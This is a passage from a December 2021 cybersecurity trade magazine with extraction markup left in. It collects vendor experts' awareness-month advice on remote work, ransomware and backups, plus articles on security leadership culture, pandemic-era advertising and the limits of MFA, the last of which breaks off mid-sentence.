a new reality where organizations are fighting a constantly evolving and restrategizing enemy, and the<br />
Biden Administration has heavily focused on investing resources and manpower to combat ransomware.<br />
This investment is represented by the President’s recent Executive Order that presents actions to<br />
improve cybersecurity of U.S. critical infrastructure.<br />
Celebrated in October, National <strong>Cyber</strong>security Awareness Month is a time to re-educate all individuals<br />
on effective cyber hygiene and what to be on the lookout <strong>for</strong> in this new age of hybrid work. We spoke<br />
with 10 cybersecurity experts to get their insight on best practices every organization can implement to<br />
keep themselves, their employees and their customers safe.<br />
Terry Storrar, managing director, Leaseweb UK<br />
"The security risks of remote working have been well documented. Away from the office, employees are<br />
now far more likely to practice poor cyber hygiene, <strong>for</strong> example connecting to unsafe networks,<br />
transferring work data to personnel devices, or sharing unencrypted files. And threat actors are<br />
relentlessly taking advantage of these vulnerabilities.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 42<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
However, as concerning as these practices are, they are often relatively simple to fix. This <strong>Cyber</strong>security<br />
Awareness Month provides the perfect opportunity to remind ourselves and co-workers to do our part<br />
and #Be<strong>Cyber</strong>Smart. The simplest way we can do this is by developing good daily routines that work to<br />
manage the most common cybersecurity risks facing our organisations. Examples of this include keeping<br />
software up to date, backing up data, and maintaining good password practices. At the end of the day,<br />
lack of education and human error are two of the largest contributors to data breaches. Businesses need<br />
to start implementing more safeguarding protocols and make cybersecurity training not just accessible<br />
<strong>for</strong> all employees, but a basic part of onboarding.<br />
<strong>Cyber</strong> attacks nowadays do not often come from ingenious ‘hackers’ in dark rooms, they’re often the<br />
result of an employee reusing the same password, or businesses not implementing basic practices such<br />
as multi-factor authentication. By acting smart now, we can eliminate some of the greatest cyber threats<br />
facing our businesses today."<br />
Liron Damri, president/co-founder, Forter<br />
“At Forter, we’ve seen a marked uptick in Account Takeovers (ATO); a <strong>for</strong>m of identity fraud in which a<br />
third-party steals credentials and / or gains access to user accounts. Our first party data shows that ATO<br />
has increased 55% year-over-year!<br />
How can that be? The global pandemic has kept people home, and so many consumers have entered<br />
the world of eCommerce. Many of those who are new to eCommerce have proven more likely to reuse<br />
passwords and less likely to follow security best practices. Fraudsters have been opportunistic in taking<br />
over these accounts.<br />
The burden isn’t only on the consumer here, it’s on businesses to deploy more sophisticated methods<br />
and models to protect those new customers from ATO—identifying them (and approving their<br />
transactions) and preventing fraud and abuse.”<br />
Jon Clemenson, director of in<strong>for</strong>mation security, TokenEx<br />
"This National <strong>Cyber</strong>security Awareness Month, we’re reminded of how constantly evolving cyber threats<br />
such as breaches and ransomware create the need <strong>for</strong> security professionals to develop increasingly<br />
sophisticated defense strategies. These strategies can vary widely, which makes it especially important<br />
<strong>for</strong> security leaders to select the appropriate controls and security methods <strong>for</strong> the unique needs of their<br />
organization.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 43<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
In reality, there’s no one ‘silver bullet’ <strong>for</strong> cyber defense. Instead, a mature posture will combine a variety<br />
of security methodologies and technologies <strong>for</strong> data discovery, classification, access management,<br />
protection, and more. Further, it must function in a manner that accommodates necessary business<br />
operations. Finding the right balance between security and operability is one of the greatest challenges<br />
security professionals face, but it’s absolutely essential <strong>for</strong> a successful cybersecurity strategy.”<br />
Tyler Farrar, CISO, Exabeam<br />
“National <strong>Cyber</strong> Security Awareness Month <strong>2021</strong> is a time to reflect on the major technological and<br />
lifestyle shifts brought on by the pandemic and their security implications. Remote work unexpectedly<br />
became the norm in 2020, and as we close out <strong>2021</strong>, the hybrid work model may be here to stay <strong>for</strong><br />
decades to come. It’s clear that it's working.<br />
These changing approaches to work have caused security leaders and their teams to balance what’s<br />
necessary to keep sensitive company data and assets safe and secure in organizational landscapes that<br />
no longer have a security perimeter. People are everywhere now. Meanwhile, adversaries are growing<br />
more sophisticated by the hour. Critical infrastructure organizations like Colonial Pipeline, agriculture<br />
organizations like New Cooperative and tech firms like Kaseya and Olympus being targeted by<br />
cybercriminal groups are hitting the headlines on a near-weekly basis. How can security teams keep up<br />
with the barrage of attacks and network perimeter shifts?<br />
Rather than retreating back to legacy methods and previous strategies, companies must #Be<strong>Cyber</strong>Smart<br />
and tackle modern threats head on. It’s critical to highlight that compromised credentials are the reason<br />
<strong>for</strong> 61% of breaches today. To remediate incidents involving user credentials and respond to adversaries,<br />
organizations must consider an approach that is closely aligned with monitoring user behavior to get the<br />
necessary context needed to restore trust, and react in real time, to protect employee accounts. This<br />
should include the ability to understand what normal looks like in your network, so when anything<br />
abnormal occurs, you can immediately detect it and prevent it from causing harm or damage to your<br />
organization.<br />
Employees must also play a role. Security teams that shake up their password protocols such as never<br />
using the same password twice, using password vaults and enabling multi-factor / adaptive authentication<br />
are winning against the adversaries. A combination of behavioral analytics and smart password practices<br />
can help employees, and their employers, stop credential-based attacks and adversarial lateral<br />
movement. Use this month to be sure you have the right threat detection, investigation and response<br />
(TDIR) technologies in place <strong>for</strong> yourself and your security teams."<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 44<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Danny Lopez, CEO, Glasswall<br />
“During this year’s National <strong>Cyber</strong> Security Awareness Month, I very much hope executive teams realize<br />
that employees should not be the only line of defense against cyberattacks. With the growing<br />
technological sophistication of data breaches and the sheer volume of threats today, any individual within<br />
a network can easily become a target.<br />
Un<strong>for</strong>tunately, most employees are unfamiliar with how to properly protect themselves. Attackers know<br />
how to depend on predictable patterns of human behavior to gain an advantage against their targets.<br />
Many users don’t think twice about opening an attachment or clicking a link that appears to be legitimate.<br />
As insider threats have increased by 47% this year, users may also think they are communicating with a<br />
colleague when the account has actually been taken over by an adversary.<br />
The best option is to remove the threat entirely be<strong>for</strong>e the user needs to make a choice. Increasingly,<br />
traditional sandboxing and antivirus software aren’t enough. Implementing solution-based file protection<br />
software like Content Disarm and Reconstruction (CDR) can rebuild files to a higher security standard so<br />
users can benefit from safe, clean files and organizational leadership can have peace of mind.”<br />
Surya Varanasi, CTO, StorCentric<br />
“Driven in large part by the COVID pandemic, massive layoffs, and record numbers of people being sent<br />
home virtually overnight to work, learn, shop and live, the number of successful cyberattacks climbed to<br />
dizzying heights. In fact, recent IDC research indicated that over the past year, more than one third of<br />
organizations worldwide experienced a ransomware attack or breach that successfully blocked access<br />
to systems or data. And <strong>for</strong> those that fell victim, many experienced multiple ransomware events. With<br />
cybercrime projected to cost the world $10.5 trillion annually by 2025, it is clear why ensuring your<br />
organization is taking the appropriate measures to ensure cyber safety and security must become priority<br />
number one.<br />
Traditionally, the game plan has been to maintain production data storage on-site, snapshot the data,<br />
replicate to an off-site location, store it to a disk, and then move it to tape storage and/or the cloud.<br />
Un<strong>for</strong>tunately, cybercriminals know this and have engineered their technology to behave accordingly.<br />
Bad actors can now rather easily use ransomware to infiltrate your network and render all <strong>for</strong>ms of<br />
traditional backup useless.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 45<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Today, what is required is an elevation in backup strategy from basic to unbreakable. In other words, <strong>for</strong><br />
today’s ransomware threat what’s needed is to make backed up data immutable, thereby eliminating any<br />
way it can be deleted or corrupted. Unbreakable Backup can do just that by creating an immutable,<br />
secure <strong>for</strong>mat that also stores the admin keys in another location entirely <strong>for</strong> added protection. And, by<br />
layering-on a backup solution that has built-in verification, savvy SysAdmins can alleviate their worry<br />
about their ability to recover — and redirect their time and attention to activities that more directly impact<br />
their organization’s bottom-line objectives.”<br />
JG Heithcock, general manager of Retrospect, a StorCentric company<br />
“Today’s cyber criminals are attacking backups first, and then once under their control, coming after<br />
production data. This means that many enterprises are feeling a false sense of security, until it is already<br />
too late.<br />
I like to say, ‘backup is one thing, but recovery is everything.” In other words, choose a backup solution<br />
that ensures the recovery piece (which surprisingly, not all of them do). Look <strong>for</strong> a provider with vast<br />
experience, as well as a track record <strong>for</strong> continuous innovation that ensures its offerings are prepared to<br />
meet prevailing conditions. The solution(s) should provide broad plat<strong>for</strong>m and application support and<br />
ensure protection of every part of your IT environment, on-site, remote, in the cloud and at the edge.<br />
Next, the backup solution should auto-verify the entire backup process, checking each file in its entirety<br />
to ensure the files match across all environments, and you are able to recover in the event of an outage,<br />
disaster or cyber-attack. And, as a last but highly critical step -- at least one backup should be immutable<br />
-- unable to be altered or changed in any way, at any time. Even if the ransomware took a ride along with<br />
your data to your backup site, during the last backup.”<br />
Andy Fernandez, senior manager, product marketing, Zerto, a Hewlett-Packard Enterprise<br />
company<br />
“Saying that ransomware attacks are growing in severity and volume is an understatement. Hackers are<br />
finding ways to prolong unplanned downtime and increase data loss, and getting operational (back up<br />
and running) as quickly as possible is key. Yet legacy data protection solutions aren’t focused on the<br />
speed of recovery—only on recovering that data. Many organizations pay the ransom simply because of<br />
how long it would take their backup systems to restore encrypted data. While restoring the encrypted<br />
data is paramount, meeting those SLAs must have equal priority within the modern organization.<br />
Organizations cannot af<strong>for</strong>d to wait days <strong>for</strong> critical applications to be up and running. From web<br />
experiences to employee tools, time is money and reducing unplanned downtime is key.<br />
Ransomware attacks are evolving, targeting next-gen applications like Kubernetes and Microsoft 365. As<br />
the adoption of cloud applications grows, so will exploits and attacks and in turn the importance of<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 46<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
estoring data. Modern organizations that are responsible <strong>for</strong> that data will need to have native data<br />
protection solutions that can help them protect internal applications and applications shipped using<br />
containers. For example, we are seeing file-less attacks explicitly targeting stateful Kubernetes data. The<br />
consequences of downtime <strong>for</strong> these applications are growing, and organizations need solutions that are<br />
native and purpose-built to protect these applications. Whether the target is VMs, Kubernetes, or SaaS<br />
applications, being resilient when facing ransomware attacks is crucial.”<br />
Wes Spencer, VP, external CSO, ConnectWise<br />
“Let's admit it. <strong>Cyber</strong>security feels like a losing game. Breaches happen everywhere we look. It seems<br />
like no ef<strong>for</strong>t we make is really making a difference. And beyond that? Ransomware threat actors are<br />
spotted on the news driving camo green Lamborghini Aventadors. I can understand any SMB just wanting<br />
to give up in exasperation. But there is hope, and it comes in the <strong>for</strong>m of cyber resilience.<br />
If you've never heard of cyber resilience, don't be shocked. It's a decade old term that is finally being<br />
revived amidst our travails but is now shining light as a powerful solution <strong>for</strong> MSPs and their SMBs. In<br />
short, cyber resilience is a renewed focus on keeping an organization resilient and operational in the<br />
midst of adverse cybersecurity conditions. Translated thus: let's build resilience to keep our organization<br />
functional when, not if, the big cyber attack happens. It allows us to focus on faster response and recovery<br />
to any threat. To be clear, we should not give up on prevention, we simply need to have a new focus on<br />
cyber resilience. After all, if we're unable to stop all cyber attacks, maybe we should start to focus on<br />
making them less impactful when they occur.”<br />
Neil Jones, cybersecurity evangelist, Egnyte<br />
“During <strong>Cyber</strong>security Awareness Month, we should actively review our cybersecurity preparedness, and<br />
consider how we can make our employees, contractors and business partners even safer online.<br />
Un<strong>for</strong>tunately, many organizational stakeholders are unaware of how to properly protect their companies'<br />
valuable data, so it’s up to the company to educate them on best practices. As an IT leader, you need to<br />
consistently update your cyberattack prevention strategies and implement practical measures like the<br />
following, which will protect you from falling victim to potential attacks:<br />
· Make compulsory cybersecurity awareness training a way of life, rather than a once-a-year IT<br />
requirement.<br />
· Limit access to mission-critical data on a “business need to know” basis.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 47<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
· Advocate a proactive approach to detect data misuse- including potential Insider Threats- be<strong>for</strong>e<br />
it’s too late.<br />
· Encourage all of your company’s stakeholders to speak up if they see a potential IT Security issue.<br />
Just like at the airport or in a train station, “if they see something, they should say something.”<br />
Throughout this month, encourage your employees and executive team to take proactive steps to<br />
enhance cybersecurity and remember to rein<strong>for</strong>ce the importance of personal accountability with all of<br />
your associates.”<br />
About the Author<br />
In his role as TokenEx’s in<strong>for</strong>mation security<br />
practice lead, Jon Clemenson combines a focus<br />
on quantifying and improving our security posture<br />
with a passion <strong>for</strong> automation. With 15 years of<br />
results-driven leadership experience in the tech<br />
industry and federal government, he considers<br />
security a team sport and enjoys tackling<br />
problems from a learn-it-all perspective. When he<br />
isn’t implementing initiatives that align security with<br />
business efficiency, you can find him in line at the nearest food truck.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 48<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
When Diplomacy, Finance and Tech Collide:<br />
<strong>Cyber</strong>security Lessons Learned from Years Across Careers<br />
By Danny Lopez, CEO, Glasswall<br />
While technology, finance and diplomacy may seem worlds away from one another in most people’s<br />
minds, they may be surprised to learn that there is significant crossover of the skills required.<br />
Prior to my time at Glasswall, I worked in finance <strong>for</strong> the first decade of my career at Barclays in a variety<br />
of international banking positions. I then transitioned into working as the managing director of marketing<br />
and communications at the Department of International Trade in the UK where I focused on implementing<br />
a marketing plan <strong>for</strong> the promotion of the UK economy internationally. I also worked with <strong>for</strong>mer London<br />
Mayor Boris Johnson to create London & Partners, the UK Capital’s international trade, investment, and<br />
promotional agency. After this role, I was appointed to the post of British Consul General to New York<br />
where I was responsible <strong>for</strong> the UK’s economic profile, <strong>for</strong>eign policy, and national security priorities in<br />
the tri-state area. During those five years, I gained a strong interest in technology which led to my role as<br />
the COO of Blippar, a technology firm specializing in augmented reality, be<strong>for</strong>e joining Glasswall.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 49<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
These cross-industry roles have collided to teach me valuable lessons about running transatlantic<br />
organisations -- as well as how to protect them from digital adversaries and nation-state threats. Through<br />
my diverse experience, I’ve learned that organisations can make improvements to their overall<br />
cybersecurity effectiveness by focusing on improving training, taking initiative, and increasing internal<br />
communication and collaboration ef<strong>for</strong>ts.<br />
<strong>Cyber</strong>security Culture Starts at the Top<br />
Leaders across each and every industry I’ve worked in are the ones who set the tone <strong>for</strong> how their teams<br />
engage with challenges, solutions and risks. A culture of security awareness and protection starts at the<br />
top.<br />
Their willingness to learn about cybersecurity can make a huge difference in the way the team<br />
approaches education and awareness. <strong>Cyber</strong>security training is often treated as a one-time, brief session<br />
to go over the basics such as password best practices and how to recognize phishing attacks. While this<br />
approach can be educational, there is a lack of engagement happening. organisations typically treat<br />
cybersecurity training as a ‘box ticking’ strategy, where employees are asked to do a training session and<br />
assume the job is done. In reality, employers should be creating a culture that helps people identify<br />
security challenges while also investing in the right technologies.<br />
Moreover, having a supportive and collaborative leadership team is crucial to creating a strong sense of<br />
involvement around cybersecurity. This involves taking a zero-trust approach to cybersecurity by<br />
assuming that there could always be risks. According to a 2020 Insider Threat Report, 68% of<br />
organisations reported that insider attacks were becoming more frequent. This involves having clear onboarding<br />
and off-boarding procedures <strong>for</strong> employees, hosting clear cybersecurity training sessions,<br />
regularly changing passwords, and having two-factor authentication on at all times. In addition,<br />
businesses should be aware of the best possible technological solutions.<br />
Taking Initiative with <strong>Cyber</strong>security Protection and Risk Factor Awareness<br />
In addition, many organisations struggle with corporate procrastination around cybersecurity issues. This<br />
can lead to major repercussions down the line. Issues should be addressed head on. There are many<br />
relevant examples of this such as an employee putting off changing passwords or implementing twofactor<br />
authentication. The number of stolen passwords and usernames in circulation has increased by<br />
300% since 2018 (Digital Shadows Research Team). Passwords are shared between personal and work<br />
devices and are often written in plain sight rather than secured with a password manager. This further<br />
improves the importance of taking a proactive approach to cybersecurity measures. Passwords should<br />
be regularly changed and updated. Leadership teams should be taking these extra steps.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 50<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Another way leaders can take initiative in cybersecurity protection is by implementing proactive tools that<br />
work to prevent the problem be<strong>for</strong>e it arises. For example, Content Disarm and Reconstruction (CDR)<br />
technology removes potential threats from every file by inspecting, cleaning, and rebuilding files to a<br />
“known good” standard.<br />
Although some organisations may take some precautions, a leader or leadership team may not always<br />
understand the risks and how they should be addressed. For example, leaders may comprehend that<br />
ransomware attacks are on the rise but cannot translate that into the risks it presents to their own<br />
networks. <strong>Cyber</strong>security concerns should be addressed directly by preparing to implement change. This<br />
is not just about investing in technology but is about identifying the risk factors associated with major<br />
problems such as ransomware and phishing. While effective cybersecurity is built around strong<br />
technological solutions, organisations that are aware and ready to address these issues will always be<br />
better prepared.<br />
Clear Communication and Collaboration<br />
One of the biggest challenges and crucial values in the workplace is direct, honest communication and<br />
collaboration. In many organisations across sectors, there is a serious disconnect between leadership<br />
and other vital stakeholders. For example, some leaders view cybersecurity as an IT problem, and as a<br />
result, keep important issues at arm's length. They may not prioritize cybersecurity investment in the<br />
same way because it does not show a tangible ROI in most cases.<br />
There is still a large number of organisations that could benefit from prioritizing cybersecurity at a<br />
leadership level. Improving communication ef<strong>for</strong>ts between all parties is crucial to protect from growing<br />
cybersecurity risks. The estimated cost of cybercrime exceeded $1 trillion globally in 2020, more than a<br />
50% increase in two years (The Hidden Costs of <strong>Cyber</strong>crime, McAfee). It is better <strong>for</strong> organisations to be<br />
prepared by investing in cybersecurity best practices be<strong>for</strong>e it’s too late.<br />
Ultimately, organisations can improve their approaches to cybersecurity as a whole by staying up to date<br />
on the latest threats, modernising cybersecurity training and technology and ensuring everyone from the<br />
board and executives to the security analysts themselves have a clear cut, coordinated plan in place. It’s<br />
no simple task, but after decades working in international relations, finance and technology and observing<br />
security practices across them all, I can assure you these steps will put your team on the right path.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 51<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Danny Lopez is the CEO at Glasswall. Danny has enjoyed a<br />
successful international career to date in banking, marketing,<br />
diplomacy, and technology. Danny is the CEO of award-winning<br />
cyber security firm Glasswall, which delivers unique protection<br />
against sophisticated threats through its ground breaking<br />
technology. For two years up until August 2018 Danny was the<br />
COO at Blippar, a UK-based augmented reality (AR) pioneer.<br />
Between 2011 and 2016 Danny was the British Consul General<br />
to New York and Director General <strong>for</strong> trade and investment<br />
across North America. Be<strong>for</strong>e this diplomatic posting, Danny<br />
was appointed by the Mayor of London as the inaugural CEO of<br />
London & Partners, the UK capital’s official promotional agency. Previously, Danny was a Managing<br />
Director at the UK government’s Department <strong>for</strong> International Trade. The first ten years of Danny’s career<br />
were at Barclays Bank, where he held several senior international positions in corporate and investment<br />
banking in London, New York, Miami, and Mumbai. Danny is a Non-Executive Director at Innovate<br />
Finance – the UK industry body championing global FinTech – and a special advisor to New York-based<br />
venture capital firm, FinTech Collective. He is also a Council Member and Trustee at the University of<br />
Essex, his alma mater. Danny speaks regularly on plat<strong>for</strong>ms across the world on topics including<br />
geopolitics and the intersection of market disrupting technologies and government policy. Danny holds<br />
a Bachelor of Arts degree in economics and a Master’s degree in international economics and finance<br />
from the University of Essex. Born in England, Danny grew up in Spain and is a fluent Spanish speaker.<br />
Danny and his Australian wife Susan live in London with their three children. Danny can be reached<br />
online at @GlasswallCDR and at our company website www.glasswallsolutions.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 52<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How Covid-19 Changed Advertising Forever<br />
By Bernie Brode, product researcher at Microscopic Machines<br />
There has been much written about how the Covid-19 pandemic has exacerbated inequality. Across the<br />
world, the virus exposed just how unprepared some countries, communities, and companies were <strong>for</strong><br />
crisis, and those with the fewest resources were invariably those that were least able to respond.<br />
The same was true of advertisers.<br />
At the broadest level, the pandemic <strong>for</strong>ced most brands to shift most of their marketing online. Some<br />
advertising agencies and plat<strong>for</strong>ms were ready <strong>for</strong> this, and some weren’t. This meant that, during the<br />
two long years of lockdowns and remote working, the agencies that were already in a strong digital<br />
position consolidated this, because those that weren’t failed to survive.<br />
The firms that have survived face a radically different market, with several advertising technologies<br />
spiking in popularity. In this article, we’ll look at three of the most important, and explain what this<br />
increased popularity means <strong>for</strong> the future of advertising.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 53<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Connected TV<br />
It might seem strange to start this list with Connected TV – a relatively small part of the media landscape,<br />
and one that advertisers have been slow to embrace. But the importance of advertising on streaming<br />
services was hugely increased by the pandemic, and specifically by a strange coincidence. This is that a<br />
number of much anticipated streaming services were already due to launch during the period of stay-athome<br />
orders.<br />
These services include NBCUniversal’s Peacock and WarnerMedia’s HBO Max, both of which had the<br />
“good <strong>for</strong>tune” to launch at a time when there was a large and almost captive audience <strong>for</strong> this.<br />
Unsurprisingly, this led to the launch of both services going unexpectedly well. Some analysts have even<br />
spoken about a “revolution” in the TV industry, in which a long-term trend away from “traditional” cable<br />
and satellite television companies has become an abrupt abandonment.<br />
Audience figures certainly give credence to this view. Across the US, cord-cutting spiked during the<br />
pandemic rise: eMarketer <strong>for</strong>ecast late last year that more than 6 million U.S. households had canceled<br />
their pay TV subscriptions last year, with TV ad spend dropping 15%, to its lowest level since 2011. This<br />
is not a short-term process, of course. But until now, it was expected the advertisers would have another<br />
decade – at least – to transition away from making TV adds, and gain expertise in new media. That time<br />
is now upon us, much earlier than some had hoped.<br />
This doesn’t mean, of course, that video marketing will die. Far from it. And in fact, with the rise of TikTok<br />
and similar apps over the past year, it could be said that we are entering a golden age <strong>for</strong> video marketing.<br />
However, advertisers will need to quickly gain (or hire) expertise in these “new” video plat<strong>for</strong>ms in order<br />
to take advantage of them, and ensure that their content stays relevant.<br />
E-Commerce<br />
The second big pandemic-driven shift in the last two years has been the rise and rise of e-commerce<br />
plat<strong>for</strong>ms. This, again, was not a trend that was invisible be<strong>for</strong>e the pandemic, but it is one that the virus<br />
accelerated rapidly. In short, e-commerce plat<strong>for</strong>ms are quickly becoming the standard way to purchase<br />
goods and services, with IRL stores needing to offer something extra to justify their existence.<br />
In principle, this is great news <strong>for</strong> advertising companies, or at least those capable of desiging, making,<br />
and delivering digital ads. eMarketer <strong>for</strong>ecast in the fall that marketers would spend $17.37 billion in<br />
advertising on e-commerce sites and apps in 2020, up 38% from 2019. More recent figures, showing a<br />
huge increase in the volume of online sales during the pandemic, and sustained afterward, have led<br />
some to conclude that the retail industry has changed <strong>for</strong>ever.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 54<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
However, this shift might not be such a simple one <strong>for</strong> advertisers. Many of these new e-commerce<br />
plat<strong>for</strong>ms are keen to handle promotion and advertising themselves, and in fact offer this to sellers as the<br />
primary advantage of their plat<strong>for</strong>ms. At the same time, more customers than ever are using ad blockers.<br />
This means that the “traditional” way in which advertising reaches consumers in the digital space is<br />
quickly becoming unfeasible, and unprofitable.<br />
Because of this, advertisers may find themselves becoming experts in the “dark arts” or e-commerce<br />
promotion. We are fast entering a world, in other words, in which customer reviews and SEO replace<br />
creative copy and marketing design.<br />
Flexibility<br />
Ultimately, however, the most important way in which the pandemic may have changed the advertising<br />
industry is by highlighting how quickly economic conditions can change. The firms which per<strong>for</strong>med best<br />
over the past two years were those that were able to quickly pivot to new ways of working, and new ways<br />
of reaching their audiences.<br />
While <strong>for</strong> small firms this may have been a relatively straight<strong>for</strong>ward shift, larger firms found it very difficult.<br />
Forrester Research <strong>for</strong>ecast last year that the U.S. ad agency sector would lay off 52,000 jobs in <strong>2021</strong><br />
and 2022 amid spending cuts. Flexible marketing organizations have been one place those workers could<br />
turn, but many have left the industry permanently.<br />
These workers are going to be replaced by advertisers who came of age during the pandemic, and who<br />
see the value of embedded digital marketing. And dollars began to shift over to creators even more: A<br />
report from influencer marketing plat<strong>for</strong>m CreatorIQ said sponsored posts were up 46.6% year-over-year<br />
during the post-Thanksgiving sales weekend. This will be the legacy of the pandemic on the industry,<br />
and one that will shape it <strong>for</strong> years to come.<br />
The Future<br />
The pandemic has caused major changes in the industry, and accelerated some that were already<br />
apparent. Certain pieces of the ad industry were catapulted years <strong>for</strong>ward as consumers stayed at home<br />
during the pandemic. Digital reigned supreme: Flexible buys, an ability to switch out messaging and<br />
direct-response buys that clearly showed return-on-investment were in high-demand by many advertisers<br />
who often had no idea what the next month, or even the next week, would look like.<br />
And that’s the new reality that we all have to live with.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 55<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Bernard Brode is a product researcher at Microscopic<br />
Machines and remains eternally curious about where the<br />
intersection of AI, cybersecurity, and nanotechnology will<br />
eventually take us.<br />
Bernie can be reached online at bernie.l.brode@gmail.com<br />
and https://twitter.com/berniebrode?lang=en.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 56<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Why MFA Alone Isn’t Enough <strong>for</strong> True <strong>Cyber</strong>security<br />
By Bojan Simic, Co-Founder, Interim CEO & CTO, HYPR<br />
Multi-factor authentication (MFA) was once a <strong>for</strong>eign terminology, but today, with the myriad of hacks<br />
and data breaches dominating headlines, it’s fair to say that most individuals now see MFA as a nobrainer<br />
– <strong>for</strong> now. When thinking about MFA, both companies and consumers alike consider it to be a<br />
safer, more secure option. And while that isn’t necessarily untrue (as it is safer than single-factor<br />
authentication), it doesn’t bypass the increasingly large password issue developing across digital<br />
mediums. In fact, despite widespread MFA adoption, account takeover fraud generated a $3.3 billion loss<br />
in 2020.<br />
Ever since the “password” was invented in the 1960s, it has been a topic of contention. The intent, always<br />
positive; but the efficacy, an ongoing debate – especially with the pace at which technology is evolving.<br />
As it stands today, there are three different kinds of MFA, the first being One-Time Passwords (OTP).<br />
OTP are a string of digits that are provided to a user via an app after they have entered a username and<br />
password; however, OTP are still based on passwords (it’s in the name, after all!) and are there<strong>for</strong>e<br />
subject to MFA phishing, mobile malware and keyloggers.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 57<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The second kind of MFA is SMS two-factor authentication (the most common OTP delivery method<br />
today), wherein OTP are delivered to a user’s smartphone via text. Again, due to error or malicious<br />
activity, OTP can be delivered to the wrong mobile number or a stolen mobile phone or intercepted via<br />
SS7 network attacks. In fact, the National Institute of Standards and Technology (NIST) stopped<br />
recommending the use of SMS as a strong second factor back in 2016!<br />
And finally, PUSH authentication is another mobile-centric authentication method whereby the service<br />
provider sends the user a notification to their mobile phone. The user then has to tap the screen to get<br />
access to the account. And while PUSH authentication can be used as part of a passwordless system if<br />
the solution is built upon PKI or certificate-based authentication, most PUSH authentication is an MFA<br />
mode layered on top of additional shared secrets, including (you guessed it) a password.<br />
Un<strong>for</strong>tunately, many hackers have learned how to bypass traditional MFA, including intercepting,<br />
phishing and spoofing SMS text messages; many also engage in SIM swapping, wherein a hacker<br />
impersonates the target to dupe a wireless carrier employee into porting the phone number associated<br />
with their SIM card to a new (malicious) device. Moreover, there also new tools – e.g., Modlishka – that<br />
automate phishing attacks that bypass MFA. It couldn’t be easier <strong>for</strong> hackers nowadays.<br />
So, the question is, how do we move away from passwords yet still ensure enterprise level<br />
security?<br />
Every individual today is experiencing a certain level of MFA fatigue, then add the fact that every<br />
business, big and small, is maneuvering through the complex authentication landscape, while now<br />
managing the IT challenges of remote work. In fact, enterprise IT helpdesk departments spend more than<br />
30% of their time helping users with password and access issues, which prevents them from making<br />
progress on innovative projects that ultimately move the business <strong>for</strong>ward. So, despite being mandated,<br />
MFA still carries a level of resistance.<br />
The solution? Marrying MFA with passwordless authentication. In short, combining MFA technology with<br />
a biometric login (think facial recognition). This concept removes any type of shared secret and eliminates<br />
the transmission or storing of credentials, thus removing the “man in the middle” and reducing the attack<br />
